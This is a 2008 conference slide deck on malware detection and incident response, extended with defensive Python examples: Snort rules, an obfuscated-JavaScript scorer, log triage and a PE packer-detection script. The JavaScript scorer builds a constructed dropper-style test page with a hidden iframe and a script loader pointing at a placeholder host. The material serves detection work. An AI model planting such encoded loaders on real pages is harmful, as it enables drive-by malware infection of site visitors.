Malware Analysis Made Simple SecureWorld Expo Detroit Wednesday, November 5, 2008 Paul Melson
Security Incident Response

Why Not Focus On Prevention?
- You should! But...
- Nothing is 100% secure, blah blah
- When (not "if") an incident occurs, a responsible team with a plan will:
  - Respond quickly
  - Be thorough
  - Keep costs down

You're Probably Required To
- An Incident Response Plan is a requirement of:
  - FISMA
  - HIPAA
  - ISO/IEC 27002
  - PCI-DSS

Why Do Malware Analysis In-House?
Malware is Number 1! Yay!
- Client-side attacks that install malware are the #1 external threat.
- It's not slowing down any time soon:
  - "Symantec observed an average of 61,940 active bot-infected computers per day, a 17% increase from the previous period."
  - "In the second half of 2007, 499,811 new malicious code threats were reported, a 136% increase over the first half of 2007."
  - (Source: Symantec Internet Security Threat Report, April 2008)

Malware Trends

Firewalls & Antivirus Have Lost
- Client-side attacks (web browsing and e-mail) go right through most firewall policies.
- Antivirus detection rates for current malware files are averaging 30-50%.
- If you're not adapting some other way, you've lost.
Malware is Adapting Quickly
- Take away Local Admin?
  - Malware that persists in non-admin accounts via the HKCU (HKEY_CURRENT_USER) Registry hive
- Whitelist apps with Windows Firewall?
  - Malware that hooks into browser plugin APIs
- Block IRC at the firewall?
  - Malware that uses encrypted HTTP/HTTPS back-channels

"But it's just spyware, right?"
- Our security analysts found samples in the past 18 months that:
  - Send spam or launch DDoS attacks
  - Give full desktop remote control
  - Search "Documents and Settings" for SSNs, credit cards, and saved IE passwords
  - Record all screen text and input and report it in near-real time to servers in Russia
Detection

Anatomy of a Drive-By Download
(diagram: JScript exploit -> dropper -> malware servers -> more malware)

Log Files
- Firewall Logs
  - Outbound SMTP from workstations (lots!)
  - Outbound IRC connections
  - Peer-to-peer file sharing traffic, esp. Winny
  - Sustained high-volume traffic from workstations
- Proxy / Web Filter Logs
  - Monitor URLs ending in ".exe"

IDS/IPS Alerts
- Most products attempt to detect post-infection traffic, such as IRC or Winny C&C channels
- EmergingThreats.net for Snort: huge list of trojan/malware signatures, all free
- If your IDS can, write some custom rules:
  - Look for ".exe" downloads on ports where web filters won't
  - Win32 PE headers in HTTP traffic (renamed files)
  - JavaScript obfuscation techniques
Snort Rules
# Rules as shown on the slide, with HTML entities decoded. The pcre in the second rule was
# garbled on the slide; "\x22[0-9][0-9]" (a double quote followed by two digits) is a reconstruction.
alert tcp $HOME_NET any -> $EXTERNAL_NET !80 (msg:"LOCAL .exe file download on port other than 80"; flow:established; content:"GET"; depth:4; content:".exe"; nocase; classtype:misc-activity; sid:9000160; rev:1;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"LOCAL Obfuscated JavaScript document.write"; flow:from_server,established; content:"document.write"; nocase; pcre:"/document\.write\(\x22[0-9][0-9]/i"; classtype:trojan-activity; sid:9000110; rev:1;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"LOCAL Obfuscated JavaScript unescape"; flow:from_server,established; content:"script>"; nocase; content:"unescape("; nocase; classtype:trojan-activity; sid:9000111; rev:2;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"LOCAL Obfuscated JavaScript eval"; flow:from_server,established; content:"script>"; nocase; content:"eval("; nocase; classtype:trojan-activity; sid:9000112; rev:2;)
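The last two rules above fire on any page that contains "unescape(" or "eval(", which includes a great deal of legitimate JavaScript, so on their own they are a triage queue rather than an alert. The following scorer is an added example (not code from the slides) that keeps the same tokens but weighs them against how much of the script is escape sequences or character-code-generated text, and decodes the obvious layers so the analyst can see what the page was about to write. The weights, the threshold and both sample pages (hostnames under the reserved name example.invalid) are constructed for illustration.

```python
"""Score HTTP response bodies for obfuscated JavaScript.

Added example, not from the original slides: the deck's Snort rules fire
on a bare "eval(" or "unescape(", which plenty of legitimate pages contain.
This scorer keeps those tokens but weighs them against how much of the
script is escape sequences or character-code-generated text, and decodes
the obvious layers so an analyst can see what the page meant to write.
Weights, thresholds and both sample pages are constructed for illustration.
"""
import re
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ESCAPE_RE = re.compile(r"%u[0-9a-f]{4}|%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}", re.I)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)", re.I)
UNESCAPE_LITERAL_RE = re.compile(r"unescape\s*\(\s*[\"']([^\"']+)[\"']\s*\)", re.I)
DECODER_INTO_SINK_RE = re.compile(
    r"\b(eval|document\.write)\s*\(\s*(unescape|String\.fromCharCode)\s*\(", re.I)
BARE_TOKEN_RE = re.compile(r"\b(eval|unescape)\s*\(", re.I)   # what the Snort rules match
SUSPICIOUS_SCORE = 3   # assumption: tune against your own proxy traffic


def decode_layers(js: str) -> list:
    """Decode literal unescape("%XX...") strings and fromCharCode(n, n, ...) calls."""
    out = [unquote(m) for m in UNESCAPE_LITERAL_RE.findall(js)]   # %XX only; %uXXXX not handled
    for args in FROMCHARCODE_RE.findall(js):
        out.append("".join(chr(int(a)) for a in args.split(",") if a.strip()))
    return out


def score_script(js: str) -> dict:
    """Weighted indicators for one <script> body; higher means more likely obfuscated."""
    reasons, score = [], 0
    escaped = sum(len(m) for m in ESCAPE_RE.findall(js))
    ratio = escaped / max(len(js), 1)
    if ratio > 0.20:
        score += 3
        reasons.append(f"{ratio:.0%} of the script is escape sequences")
    if DECODER_INTO_SINK_RE.search(js):
        score += 3
        reasons.append("eval/document.write fed directly by unescape/fromCharCode")
    if any(args.count(",") >= 20 for args in FROMCHARCODE_RE.findall(js)):
        score += 2
        reasons.append("String.fromCharCode with 20+ character codes")
    if max((len(line) for line in js.splitlines()), default=0) > 1000:
        score += 1
        reasons.append("script line longer than 1000 characters")
    if BARE_TOKEN_RE.search(js):
        score += 1
        reasons.append("bare eval( or unescape( present")
    return {"score": score, "reasons": reasons, "decoded": decode_layers(js)}


def analyze_page(html: str) -> dict:
    """Score every <script> block in an HTTP response body and merge the results."""
    parts = [score_script(js) for js in SCRIPT_RE.findall(html)]
    score = sum(p["score"] for p in parts)
    return {"score": score, "suspicious": score >= SUSPICIOUS_SCORE,
            "reasons": [r for p in parts for r in p["reasons"]],
            "decoded": [d for p in parts for d in p["decoded"]]}


def pct_escape(s: str) -> str:
    """Build the %XX form a dropper page would carry (used only to build the sample)."""
    return "".join("%%%02X" % ord(c) for c in s)


# Constructed samples; example.invalid is a reserved, non-resolving name.
IFRAME_PAYLOAD = '<iframe src="http://example.invalid/in.php" width=1 height=1></iframe>'
LOADER_PAYLOAD = ("var s=document.createElement('script');"
                  "s.src='http://example.invalid/x.js';document.body.appendChild(s);")
OBFUSCATED_PAGE = (
    "<html><body><h1>Welcome</h1><script>\n"
    f'document.write(unescape("{pct_escape(IFRAME_PAYLOAD)}"));\n'
    "eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in LOADER_PAYLOAD) + "));\n"
    "</script></body></html>")
BENIGN_PAGE = (
    "<html><body><script>\n"
    "function parseResponse(txt) {\n"
    "  return window.JSON ? JSON.parse(txt) : eval('(' + txt + ')');  // legacy fallback\n"
    "}\n"
    "var label = String.fromCharCode(65) + 'pple';\n"
    "</script></body></html>")

if __name__ == "__main__":
    for name, page in (("obfuscated", OBFUSCATED_PAGE), ("benign", BENIGN_PAGE)):
        result = analyze_page(page)
        print(name, result["score"], result["suspicious"], result["reasons"], result["decoded"])
```

The benign page still contains a literal "eval(" and would trip the content match in sid 9000112; here it scores 1 and stays below the threshold, while the dropper-style page scores on three independent indicators and the decoded layers show the hidden iframe and script loader directly.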
Antivirus?! Yes, Antivirus!
- Many droppers will install multiple pieces of malware. Your antivirus might detect 1 or 2 of them.
- When you see AV alerts from a workstation, check proxy logs for what else was downloaded.
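The Log Files slide and the Antivirus slide describe one triage loop: pull the workstations talking SMTP or IRC outbound from the firewall log, pull ".exe" fetches from the proxy log, and when AV fires on a host, go back to the proxy log for everything else that host downloaded around the same time. The following is an added example (not code from the slides) that runs those checks over a handful of constructed log lines. It assumes iptables-style firewall syslog, Squid native access.log, and a one-line-per-alert AV log of "epoch host signature"; the workstation subnet, the IRC port list, the executable content types and the ten-minute window are assumptions to adjust for your own environment.

```python
"""Triage workstation activity from firewall, proxy and antivirus logs.

Added example, not part of the original slides: it applies the Log Files
indicators (outbound SMTP and IRC from workstations, ".exe" URLs in the
proxy log) and the Antivirus slide's "what else did that host download"
check to a few constructed log lines. Assumed formats: iptables-style
firewall syslog, Squid native access.log, and an AV log of "epoch host
signature". Subnet, port list, content types and window are assumptions.
"""
import re

WORKSTATION_PREFIX = "10.1.2."          # assumption: 10.1.2.0/24 is the user workstation VLAN
IRC_PORTS = {6665, 6666, 6667, 6668, 6669, 7000}
EXECUTABLE_TYPES = {"application/x-msdownload", "application/octet-stream"}
AV_WINDOW_SECONDS = 600                  # look 10 minutes either side of an AV alert

FW_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=\w+ SPT=\d+ DPT=(?P<dpt>\d+)")
# Squid native format: time elapsed client code/status bytes method URL ident hierarchy type
SQUID_RE = re.compile(r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+\S+\s+"
                      r"(?P<url>\S+)\s+\S+\s+\S+\s+(?P<ctype>\S+)")
AV_RE = re.compile(r"^(?P<ts>\d+)\s+(?P<host>\S+)\s+(?P<sig>.+)$")


def firewall_findings(lines):
    """Workstations making outbound SMTP or IRC connections (the slide's first two indicators)."""
    findings, smtp = {}, {}
    for line in lines:
        m = FW_RE.search(line)
        if not m or not m["src"].startswith(WORKSTATION_PREFIX):
            continue                                   # servers and non-TCP/UDP lines are skipped
        dpt = int(m["dpt"])
        if dpt == 25:
            smtp[m["src"]] = smtp.get(m["src"], 0) + 1
        elif dpt in IRC_PORTS:
            findings.setdefault(m["src"], []).append(f"outbound IRC to {m['dst']}:{dpt}")
    for host, n in smtp.items():
        findings.setdefault(host, []).append(f"{n} outbound SMTP connections")
    return findings


def proxy_downloads(lines):
    """Parse Squid lines into (epoch, client, url, content_type) tuples."""
    rows = []
    for line in lines:
        m = SQUID_RE.match(line)
        if m:
            rows.append((float(m["ts"]), m["client"], m["url"], m["ctype"]))
    return rows


def exe_downloads(downloads):
    """URLs ending in .exe, plus executable content types on URLs that hide the extension."""
    findings = {}
    for _, client, url, ctype in downloads:
        path = url.split("?", 1)[0]
        if path.lower().endswith(".exe"):
            findings.setdefault(client, []).append(f"downloaded {url}")
        elif ctype in EXECUTABLE_TYPES:
            findings.setdefault(client, []).append(f"executable content type on {url}")
    return findings


def av_context(av_lines, downloads, window=AV_WINDOW_SECONDS):
    """For each AV alert, everything that host fetched within +/- window seconds."""
    ctx = []
    for line in av_lines:
        m = AV_RE.match(line)
        if not m:
            continue
        ts, host = int(m["ts"]), m["host"]
        related = [url for t, c, url, _ in downloads if c == host and abs(t - ts) <= window]
        ctx.append({"host": host, "signature": m["sig"], "downloads": related})
    return ctx


def triage(fw_lines, proxy_lines, av_lines):
    """Merge all three sources into one host -> findings map for the responder."""
    downloads = proxy_downloads(proxy_lines)
    findings = firewall_findings(fw_lines)
    for host, items in exe_downloads(downloads).items():
        findings.setdefault(host, []).extend(items)
    for c in av_context(av_lines, downloads):
        findings.setdefault(c["host"], []).append(
            f"AV alert {c['signature']}; {len(c['downloads'])} downloads within {AV_WINDOW_SECONDS}s")
    return findings


# Constructed sample logs (RFC 5737 documentation addresses, epoch times on 2008-11-05).
FW = ("Nov  5 10:02:{s:02d} fw kernel: IN=eth1 OUT=eth0 SRC={src} DST={dst} LEN=60 TOS=0x00 "
      "PREC=0x00 TTL=127 ID=1 DF PROTO=TCP SPT=491{s:02d} DPT={dpt} WINDOW=8192 SYN")
FW_LOG = [FW.format(s=1, src="10.1.2.30", dst="198.51.100.20", dpt=25),
          FW.format(s=2, src="10.1.2.30", dst="198.51.100.21", dpt=25),
          FW.format(s=3, src="10.1.2.30", dst="203.0.113.9", dpt=6667),
          FW.format(s=4, src="10.1.2.44", dst="192.0.2.80", dpt=443),       # ordinary HTTPS
          FW.format(s=5, src="10.1.1.25", dst="198.51.100.20", dpt=25)]     # mail relay, not a workstation
PROXY_LOG = [
    "1225900800.101 312 10.1.2.30 TCP_MISS/200 51234 GET http://cdn.example.invalid/js/site.js - DIRECT/192.0.2.10 application/x-javascript",
    "1225900805.220 420 10.1.2.30 TCP_MISS/200 98304 GET http://update.example.invalid/load.php?id=7 - DIRECT/203.0.113.5 application/octet-stream",
    "1225900806.431 118 10.1.2.30 TCP_MISS/200 61440 GET http://update.example.invalid/files/svchost.exe - DIRECT/203.0.113.5 application/octet-stream",
    "1225900807.900 90 10.1.2.30 TCP_MISS/200 40960 GET http://update.example.invalid/files/Setup.EXE?v=2 - DIRECT/203.0.113.5 application/x-msdownload",
    "1225900900.000 25 10.1.2.44 TCP_HIT/200 2048 GET http://www.example.invalid/index.html - NONE/- text/html"]
AV_LOG = ["1225900810 10.1.2.30 Trojan.Dropper.Generic in C:\\Documents and Settings\\user\\Local Settings\\Temp\\svchost.exe"]
```

Run `triage(FW_LOG, PROXY_LOG, AV_LOG)` and the only host that surfaces is 10.1.2.30: two SMTP connections and an IRC connection from the firewall, three executable fetches from the proxy, and the AV alert tied back to four downloads in the ten minutes around it. The mail relay is excluded by subnet, not by a port exception, so move it out of the workstation range rather than adding an allow-list entry.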
Analysis

For Starters
- VirusTotal
  - http://www.virustotal.com
- Norman Sandbox
  - http://www.norman.com/microsites/nsic/Submit/en-us
- CWSandbox
  - http://www.cwsandbox.org
Detecting Packed Files
- Packers are used to obfuscate malware executables from antivirus scanners.
- PEiD
  - http://www.peid.info/
- pefile
  - http://code.google.com/p/pefile/
- Jim Clausing's packerid.py
  - http://handlers.dshield.org/jclausing/

Analyzing Binary Files
- Utilities perform deeper scans of executables to determine the likelihood that they are suspicious/malicious
- Mandiant Red Curtain
  - http://www.mandiant.com/mrc
- Resource Hacker
  - http://angusj.com/resourcehacker/
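What the packer-identification and binary-scoring tools on the two slides above actually look at is the PE section table: section names written by a particular packer, sections whose bytes are near-random (compressed or encrypted code), and an entry point that does not sit in the first code section. The following is an added example (not code from the slides or from any of the tools listed) that walks a PE32 section table with nothing but the standard library and scores those three indicators. The two binaries it inspects are assembled in the file itself and are not real malware; the packer section-name list and the 7.0 bits-per-byte entropy threshold are assumptions.

```python
"""Packer heuristics for a PE file, without third-party libraries.

Added example, not from the original slides: it walks the PE32 section table
and scores the indicators the packer-ID tools above look at (packer-specific
section names, section entropy, entry point outside the first section), and
builds two sample binaries to run against. The samples are constructed here
and are not real malware; the name list and threshold are assumptions.
"""
import math
import random
import struct

# Section names written by common packers (assumption: short, illustrative list).
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".petite",
                        ".nsp0", ".nsp1", ".MPRESS1", ".MPRESS2", ".themida",
                        ".vmp0", ".vmp1"}
ENTROPY_THRESHOLD = 7.0   # bits per byte; compressed or encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Return (entry_point_rva, [section dicts]); raise ValueError if not a PE."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4                                  # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20                                      # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    sections = []
    for i in range(num_sections):
        off = opt + opt_size + i * 40                    # IMAGE_SECTION_HEADER i
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr,
                         "vsize": vsize, "raw_size": raw_size,
                         "entropy": shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])})
    return entry_rva, sections


def packer_indicators(pe: bytes) -> dict:
    """Collect the reasons a file looks packed; an empty list means nothing fired."""
    entry_rva, sections = parse_sections(pe)
    reasons, ep_index = [], None
    for i, s in enumerate(sections):
        if s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], s["raw_size"]):
            ep_index = i
        if s["name"] in PACKER_SECTION_NAMES:
            reasons.append(f"packer section name {s['name']}")
        if s["entropy"] > ENTROPY_THRESHOLD:
            reasons.append(f"entropy {s['entropy']:.2f} in {s['name']}")
    if ep_index is None:
        reasons.append("entry point outside all sections")
    elif ep_index != 0:   # compilers put the entry point in the first (code) section
        reasons.append(f"entry point in section {ep_index} ({sections[ep_index]['name']})")
    return {"entry_rva": entry_rva, "sections": sections,
            "reasons": reasons, "suspected_packed": bool(reasons)}


def build_pe(sections, entry_rva: int) -> bytes:
    """Assemble a minimal PE32 image from [(name, raw_bytes)]; used only for the samples."""
    n = len(sections)
    raw_base = (0x40 + 4 + 20 + 0xE0 + 40 * n + 0x1FF) & ~0x1FF   # headers, file-aligned to 512
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0xE0, 0x0102)  # i386, PE32 optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                      # AddressOfEntryPoint
    table, body, vaddr, raw_ptr = b"", b"", 0x1000, raw_base
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), vaddr, len(data),
                             raw_ptr, 0, 0, 0, 0, 0x60000020)          # code|execute|read
        body += data
        vaddr += (len(data) + 0xFFF) & ~0xFFF                          # 4 KiB section alignment
        raw_ptr += len(data)
    return (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(raw_base, b"\0") + body


# Constructed samples: a UPX-shaped layout with near-random "compressed" code in UPX1
# and the entry point there, versus a plain compiler layout with repetitive code bytes.
rng = random.Random(2008)
PACKED_SAMPLE = build_pe([(b"UPX0", b"\0" * 64),
                          (b"UPX1", bytes(rng.randrange(256) for _ in range(4096))),
                          (b".rsrc", b"\0" * 256)], entry_rva=0x2010)
CLEAN_SAMPLE = build_pe([(b".text", bytes.fromhex("558bec83ec105356578b7d0833c05f5e5b8be55dc3") * 200),
                         (b".data", b"Hello, World!\0" * 50),
                         (b".rsrc", b"\0" * 256)], entry_rva=0x1000)
```

Entropy alone is a weak signal (a large embedded JPEG or certificate blob also scores near 8), which is why the tools on the slides combine it with section names and entry-point placement; a sample that trips only the entropy check deserves a look at which section did it before it is called packed.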
Behavioral Analysis
- Utilities analyze system activity while malware is running to identify suspicious or malicious behavior
- SysAnalyzer
  - http://labs.idefense.com/software/malcode.php
- AMIR
  - http://www.malwareinfo.org/Utilities/

Network Analysis
- Analyzing network traffic can identify the presence of malware based on the connections the machine is generating.
- SniffHit
  - http://labs.idefense.com/software/malcode.php
- Wireshark
  - http://www.wireshark.org
- TCPView
  - http://technet.microsoft.com/en-us/sysinternals/

Analyzing System Hooks
- Analyzing system startup/execution hooks can determine if malware/rootkits are present.
- OSAM Autorun Manager
  - http://www.online-solutions.ru/en/osam_autorun_manager.php
- StartupCPL
  - http://www.mlin.net/StartupCPL.shtml
- HijackThis and StartupList
  - http://www.merijn.org/programs.php
Building Toolkits

Response Toolkit: CD
- You could use a thumb drive, but read-only media is helpful here.
- Trusted Shell
  - Copy of Windows CMD.EXE on CD
- Behavioral Analysis: AMIR
- Network Analysis: TCPView
- Startup Analysis: OSAM, HijackThis

Analysis Toolkit: VM
- Use a VM tool that supports snapshots
- "Thwarting VM Detection" by Tom Liston and Ed Skoudis
- Packer Analysis: PEiD, packerid.py
- Behavioral Analysis: SysAnalyzer
- Network Analysis: Wireshark on the HOST
- Binary Analysis: Mandiant Red Curtain

Prevention & Recovery

Prevention - Whack-a-Mole
- Add malicious web sites and file names to your web content filter rules.
- Block malicious web site addresses with your firewall.
- If your AV/HIPS supports it, blacklist malicious file names and hashes as you find them.
Prevention: Local Admin?
- Restricting local admin access used to work well to prevent malware from persisting on a machine. Some won't run at all.
- More and more malware can persist in user space via the HKCU Registry hive and the Startup group.
- But recovery is still easier!
- Develop & test a procedure for renaming local user profiles in Windows to enable quick recovery from infection for non-admins.
- Save downtime costs by not re-imaging.
Parting Shot: Best Practices
- Active monitoring by security staff.
- Develop response procedures for malware incidents. Focus on response times.
- Contain potential incidents first, then analyze to determine impact.

Q & A Session
